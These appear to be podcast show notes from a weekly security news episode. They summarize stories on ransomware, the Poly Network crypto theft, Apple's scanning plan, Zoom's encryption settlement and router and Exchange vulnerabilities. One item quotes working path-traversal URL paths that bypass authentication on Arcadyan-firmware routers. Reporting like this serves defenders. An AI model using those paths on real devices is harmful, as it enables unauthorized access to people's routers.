Cyber-Symposiums, Apple Backdoor, Crypto Theft, & “Quadruple Extortion” – PSW #706
This week in the Security News: Accenture gets Lockbit, $600 million in cryptocurrency is stolen, and they've started returning it, Lee and Jeff's data is leaked (among other senior citizens), authentication bypass via path traversal, downgrade attacks, Apple's backdoor, super duper secure mode, re-defining end-to-end encryption and how that doesn't work out, pen testers file suit against Dallas County Sherriff's department, Fingerprinting Windows, double secret quadruple extortion, & more!
CyberRisk Alliance, in partnership with InfraGard, has launched the Critical Infrastructure Resilience Benchmark study. Measure your readiness for ransomware by completing the survey and getting your score. Visit https://securityweekly.com/CIRB to take the survey
In an overabundance of caution, we have decided to flip this year’s SW Unlocked to a virtual format. The safety of our listeners and hosts is our number one priority. We will miss seeing you all in person, but we hope you can still join us at Security Weekly Unlocked Virtual! The event will now take place on Thursday, Dec 16 from 9am-6pm ET. You can still register for free at https://securityweekly.com/unlocked.
- 1. Chaos Malware Walks Line Between Ransomware and Wiper - Nasty: " “Instead of encrypting files (which could then be decrypted after the target paid the ransom), it replaced the files’ contents with random bytes, after which the files were encoded in Base64. This meant that affected files could no longer be restored, providing victims no incentive to pay the ransom.” “One of the more interesting functions of Chaos version 1.0 was its worming function, which allowed it to spread to all drives found on an affected system,” de Jesus wrote. “This could permit the malware to jump onto removable drives and escape from air-gapped systems.”"
- 2. Hacker Exploiting Authentication Bypass Bug On Millions Of Routers - Yikes: "For a device in which http://
/index.htm requires authentication, an attacker could access index.htm using the following paths: http:// /images/..%2findex.htm or http:// /js/..%2findex.htm or http:// /css/..%2findex.htm" Great article on the details: https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- 3. Apple’s Plan to “Think Different” About Encryption Opens a Backdoor to Your Private Life - Interesting take on this and how it could be abused from a privacy perspective: "This means that if—for instance—a minor using an iPhone without these features turned on sends a photo to another minor who does have the features enabled, they do not receive a notification that iMessage considers their image to be “explicit” or that the recipient’s parent will be notified. The recipient’s parents will be informed of the content without the sender consenting to their involvement. Additionally, once sent or received, the “sexually explicit image” cannot be deleted from the under-13 user’s device."
- 4. Microsoft announces new ‘Super Duper Secure Mode’ for Edge - "Encouraged by these findings, Norman said the Edge team is now working on Super Duper Secure Mode, an Edge configuration where they disable JIT and enable three other security features such as Controlflow-Enforcement Technology (CET) and Arbitrary Code Guard (ACG)—two features that would normally clash with V8’s JIT implementation. As Norman explained, Super Duper Secure Mode is currently classified as an experiment, and there are no plans set in stone to ship it to users just yet."
- 5. INFRA:HALT security bugs impact critical industrial control devices - We've seen this before, very bad: "They impact the DNS client and the HTTP server components of the stack, allowing a remote attacker to execute code on the vulnerable device to take full control over it. To trigger CVE-2020-25928, an attacker would need to send a crafted DNS packet as a response to a DNS query from the vulnerable device, Forescout and JFrog researchers explain in a joint technical report published earlier today."
- 6. Zoom to pay $85M for lying about encryption and sending data to Facebook and Google - Trying to re-define end-to-end encryption: "The connection between the Zoom app running on a user's computer or phone and Zoom's server is encrypted in the same way the connection between a web browser and a website is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. In a Zoom meeting utilizing this encryption technology, the video and audio content will stay private from anyone spying on Wi-Fi, but will not stay private from the company or, presumably, anyone with whom the company shares its access voluntarily, by compulsion of law (e.g., at the request of law enforcement), or involuntarily (e.g., a hacker who can infiltrate the company's systems). With true E2E encryption, the encryption keys are generated by the client (customer) devices, and only the participants in the meeting have the ability to decrypt it." as "the encryption keys for each meeting are generated by Zoom's servers, not by the client devices."
- 7. Credit card-stealing malware found in official Python repository - I really want to know if a library is accessing my file system and/or communicating with IP addresses on the Internet... This one steals your Discord auth tokens and credit cards stored by your browser...
- 8. Men File Lawsuit Against Dallas County Sheriff - "Gary DeMercurio and Justin Wynn have filed a civil lawsuit against Dallas County and Sheriff Chad Leonard from an incident that occurred in September 2019 when the two men broke into the Dallas County Courthouse claiming they were hired to do so. The two men worked for cybersecurity advisor Coalfire, which is headquartered in Colorado. "
- 9. Fingerprinting Windows versions, AV, wireless cards over the network—all without authentication - Using Windows DCE/RPC (TCP port 135) HD and team was able to more accurately fingerprint the Windows OS type and version, in addition to determining if the host has a Wifi adapter and even what type of AV software is running. Amazing research!
- 10. Crypto-mining botnet modifies CPU configurations to increase its mining power - We need more power captain: "In a report published last week, Uptycs researchers said they spotted a crypto-mining botnet in June 2021 that was breaching Linux servers, downloading the Linux MSR driver, and then disabling hardware prefetching before installing a version of XMRig, a common app used for cryptocurrency mining by both legitimate users and malware gangs. Uptycs believes the attacker got the idea to disable hardware prefetching after reading the XMRig documentation, where it is claimed that XMRig can gain a 15% speed boost if the feature is disabled."
- 11. A Botnet is Attacking Synology NAS Devices: Here’s How to Secure Yours - Why do you need your NAS device on the Internet!?!?
- 12. Glowworm-Attack - Wow: "In this paper, we identify a new class of optical TEMPEST attacks: recovering sound by analyzing optical emanations from a device’s power indicator LED. We analyze the response of the power indicator LED of various devices to sound and show that there is an optical correlation between the sound that is played by connected speakers and the intensity of their power indicator LED due to the facts that: (1) the power indicator LED of various devices is connected directly to the power line, (2) the intensity of a device's power indicator LED is correlative to the power consumption, and (3) many devices lack a dedicated means of countering this phenomenon."
- 13. Ransomware Payments Explode Amid ‘Quadruple Extortion’ - "1) Encryption: Victims pay to regain access to scrambled data and compromised computer systems that stop working because key files are encrypted. 2) Data Theft: Hackers release sensitive information if a ransom is not paid. 3) DoS: Ransomware gangs launch DoS attacks that shut down a victim’s public websites. 4) Harassment: Cybercriminals contact customers, business partners, employees and media to tell them the organization was hacked."
- 14. Accenture claims to fight off LockBit ransomware gang with backup - "Cybercrime intelligence firm Hudson Rock revealed that nearly 2,500 computers of Accenture partners and employees were compromised. Another research firm Cyble tweeted that the attackers stole 6TB of data and have demanded a ransom of $50 million."
- 1. Catalin Cimpanu on Twitter - A security researcher (@HarioMenkel) has released today a tool named CobaltSpam that can flood Cobalt Strike servers with fake beacons and corrupt their internal databases of infected systems.
- 2. 1M Stolen Credit Cards Hit Dark Web for Free
- 3. Rob??? Graham @ Sioux Falls cyber symposium on Twitter - A good thread on the outcomes of the MyPillow guy CyberSymposium. Not a political talk.
- 4. vx-underground on Twitter - Accenture got ransomwared...?
- 5. Plugins 2500/2501 and 16800/16801 are deprecated - Hashcat, why you gotta mess with a good thing?
- 1. Over $600 million reportedly stolen in cryptocurrency hack - Poly Network has disclosed that hackers managed to steal more than $600 million USD in Binance Chain, Ethereum, and Polygon cryptocurrency assets and transfer it to attacker-controlled wallets in what is being dubbed as one of the largest DeFi hacks to date.
- 2. Bulletin: The Importance of Properly Scoping Cloud Environments - Guidance from CSA/PCI Security Standards Council on requirements and processes to assess cloud based payment processing systems. What's new is the tools to help the assessment.
- 3. Millions of Senior Citizens’ Personal Data Exposed by Misconfiguration - Millions of senior citizens in North America have had their personal information compromised following a breach at senior care review website SeniorAdvisor, containing millions of files labeled "leads" and 182GB of personally identifiable information (PII) belonging some three million of its users.
- 4. Microsoft Exchange servers scanned for ProxyShell vulnerability, Patch Now - Attackers have been spotted leveraging three chained vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) dubbed "ProxyShell" that, when chained together, can be remotely exploited via the Microsoft Exchange "Client Access Service" (CAS) running in IIS on port 443. According to reports, the ProxyShell vulnerabilities are capable of performing unauthenticated, remote code execution (RCE) against Microsoft Exchange servers.
- 5. Vulnerability Affecting Routers From Many Vendors Exploited Days After Disclosure - Cybercriminals quickly started exploiting a vulnerability that affects routers and modems from many vendors that use the same underlying firmware. CVE-2021-20090 associated with Arcadyan firmware found in 19 manufacturer's products - nclude ADB, ASMAX, ASUS, Beeline, BT, Buffalo, Deutsche Telecom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom Argentina, Telmex, Telstra, Telus, Verizon, and Vodafone.
- 6. FlyTrap Android Malware Used to Compromise Facebook Accounts - Zimperium has revealed new Android malware said to have compromised the Facebook accounts of more than 10,000 people across 144 countries since March. The company dubbed this malware FlyTrap and said that until recently it was listed on the official Google Play Store.
- 7. Black Hat USA: Downgrade attack against Let’s Encrypt lowers the bar for printing fraudulent SSL certificates - Thanks Gus for finding this! The downgrade attacks act to undermine a system with “multiple vantage points to multiple nameservers” by reducing it to “multiple vantage points to a single attacker-selected nameserver”. The system is tricked into using a specific nameserver by introducing high latency into connections to other validation nodes. In controlled tests, the researchers found that attackers were able to launch attacks against one in four (24.53%) of domains.